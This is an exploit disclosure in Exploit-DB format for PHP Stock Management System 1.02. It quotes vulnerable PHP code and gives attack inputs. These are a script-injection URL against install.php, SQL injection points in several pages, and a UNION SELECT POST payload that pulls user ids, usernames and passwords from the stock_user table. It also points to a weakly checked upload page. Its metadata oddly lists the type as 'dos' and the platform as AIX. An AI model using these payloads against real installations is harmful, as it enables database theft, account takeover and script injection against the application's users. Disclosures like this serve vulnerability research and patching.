PHP Stock Management System 1.02 - Multiple Vulnerabilities

EDB-ID:

34588

CVE:



Author:

jsass

Type:

dos


Platform:

AIX

Date:

2014-09-09


# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
​# Vendor Homepage: ​http://www.posnic.com/​
# Software Link:​ http://sourceforge.net/projects/stockmanagement/
# Version: ​1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM

#########################################################################################################



XSS  install.php

code : 

if(isset($_REQUEST['msg'])) {
					
					$msg=$_REQUEST['msg'];
					echo "<p style=color:red>$msg</p>";						
				}


exploit :

http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E


#########################################################################################################

SQL INJECTION : stock.php

code : 


include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
  while ($line = $db->fetchNextObject()) {
  
  	if (strpos(strtolower($line->name), $q) !== false) {
		echo "$line->name\n";
	
 }
 }


exploit :


localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)


#########################################################################################################
SQL INJECTION : view_customers.php




code :

$SQL = "SELECT * FROM  customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{

$SQL = "SELECT * FROM  customer_details WHERE customer_name  LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";


}





exploit  :


http://localhost/demo/POSNIC1.02DesignFix/view_customers.php

POST

searchtxt=1(inject)&Search=Search

searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################


SQL INJECTION : view_product.php

code : 

if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
	$limit=$_GET['limit'];
        $_GET['limit']=10;
}

	$page = $_GET['page'];


	if($page) 

		$start = ($page - 1) * $limit; 			//first item to display on this page

	else

		$start = 0;								//if no page var is given, set start to 0

	

	/* Get data. */

	$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
	if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{

	$sql= "SELECT * FROM  stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%'  LIMIT $start, $limit";


}


	$result = mysql_query($sql);



exploit : 

localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and

localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search




#########################################################################################################

UPLOAD :  logo_set.php

code : 

<?php if(isset($_POST['submit'])){
    
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
  {
  if ($_FILES["file"]["error"] > 0)
    {
    echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
    }
  else
    {
    $upload= $_FILES["file"]["name"] ;
    $type=$_FILES["file"]["type"];






exploit : 

http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################



AND MORE BUGS

Bye

#########################################################################################################


Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight

sec4ever.com & alm3refh.com

#########################################################################################################